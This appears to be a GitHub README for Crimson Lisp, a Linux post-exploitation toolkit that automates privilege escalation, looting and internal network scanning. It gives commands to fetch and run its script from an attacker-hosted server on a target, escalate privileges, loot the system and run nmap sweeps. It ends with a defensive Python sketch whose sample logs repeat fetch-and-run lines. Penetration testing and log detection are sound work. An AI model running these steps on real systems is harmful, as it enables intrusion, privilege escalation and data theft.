crimson_lisp
Linux Post-Exploitation tools wrapper
Crimson Lisp
Crimson Lisp is a tool that automates post-exploitation PRIVILEGE ESCALATION & LOOTING phases. It uses many open source tools. Most of them are available for download from GitHub.
Installation
git clone https://github.com/Karmaz95/crimson_lisp.git
FIRST UPDATE THE TOOL
chmod +x update.sh
./update.sh
If hosted from Windows, convert the line endings of the script files from Windows-style (CRLF) to Unix-style (LF):
dos2unix tools/les.sh tools/linpeas.sh lisp.sh update.sh
Using VS Code:
1. Open the script file in Visual Studio Code.
2. Look at the bottom right corner of the editor. You should see a label that displays the current line endings used in the file. It should either say "CRLF" or "LF".
3. Click on the label and select "LF". This will change the line endings of the file to Unix-style.
4. Save the file by going to File > Save.
Usage
ON THE HOST MACHINE
cd crimson_lisp
sudo python3 -m http.server 80
ON THE TARGET MACHINE
1. DOWNLOAD THE TOOLS
curl -s -k http://127.0.0.1/lisp.sh -o lisp.sh; chmod +x lisp.sh
./lisp.sh -u "http://127.0.0.1/"
2. ESCALATE THE PRIVILEGES
./lisp.sh -e
3. LOOT THE SYSTEM
sudo ./lisp.sh -l
4. NETWORK DISCOVERY (as root)
4.1. PING SWEEP
./nping INTERNAL_IP/24
4.2. NMAP SCAN
./run-nmap.sh -Pn INTERNAL_IP -p- --append-output -oA all_ports_scan
4.3. TOP PORTS SCAN
./run-nmap.sh -Pn 172.22.11.1/24 --top-ports 1000 --append-output -oA AD_ports
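For defenders, the fetch, chmod and run sequence in steps 1 to 3 leaves a recognisable trail in shell or process-execution logs. The sketch below is an added example, not part of Crimson Lisp; the record format, the session ids and every entry in SAMPLE_LOG are constructed assumptions.

```python
import os
import re
import shlex

# Constructed shell-audit records (session id, command line); not real logs.
SAMPLE_LOG = [
    ("s1", "curl -s -k http://127.0.0.1/lisp.sh -o lisp.sh; chmod +x lisp.sh"),
    ("s1", './lisp.sh -u "http://127.0.0.1/"'),
    ("s2", "curl -s https://example.org/report.pdf -o report.pdf"),
    ("s2", "chmod 644 report.pdf"),
    ("s3", "chmod +x deploy.sh && ./deploy.sh"),  # local script, never downloaded
    ("s4", "wget -q http://example.org/agent -O /tmp/agent; chmod 755 /tmp/agent"),
    ("s4", "sudo /tmp/agent --install"),
]

def sets_exec_bit(mode):
    """True for symbolic modes that add x (+x, u+x) or octal modes with an x bit."""
    symbolic = re.fullmatch(r"[ugoa]*\+[rwxst]*x[rwxst]*", mode)
    octal = re.fullmatch(r"[0-7]{3,4}", mode) and any(int(d) & 1 for d in mode[-3:])
    return bool(symbolic or octal)

def output_file(argv):
    """Return the file a curl/wget command writes when it fetches an http(s) URL."""
    flags = {"curl": ("-o", "--output"), "wget": ("-O", "--output-document")}.get(argv[0], ())
    if any(re.match(r"https?://", a) for a in argv):
        for i, arg in enumerate(argv[:-1]):
            if arg in flags:
                return os.path.normpath(argv[i + 1])
    return None

def find_staged_execution(records):
    """Return (session, file) pairs fetched, made executable, then run, in that order."""
    state, hits = {}, []
    for session, line in records:
        for cmd in re.split(r";|&&", line):  # naive split; ignores quoting
            argv = shlex.split(cmd)
            argv = argv[1:] if argv[:1] == ["sudo"] else argv
            if not argv:
                continue
            target = output_file(argv)
            if target:
                state[(session, target)] = "downloaded"
            elif argv[0] == "chmod" and len(argv) >= 3 and sets_exec_bit(argv[1]):
                for key in ((session, os.path.normpath(f)) for f in argv[2:]):
                    if state.get(key) == "downloaded":
                        state[key] = "executable"
            elif state.get((session, os.path.normpath(argv[0]))) == "executable":
                hits.append((session, os.path.normpath(argv[0])))
    return hits
```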
HISTORY
If you are curious about how it works, read my blog:
List of utilized tools
The following tools are used in Crimson Lisp. I encourage you to study the links below. They will help you in your work.
LICENSE
This program is free software: you can redistribute it and/or modify it under the terms of the Apache License. Crimson Lisp and any contributions are Copyright © by Karol Mazurek 2022.
SUPPORT
You can support the project by buying me a coffee or via an NFT, which unlocks the secret Crimson Web community.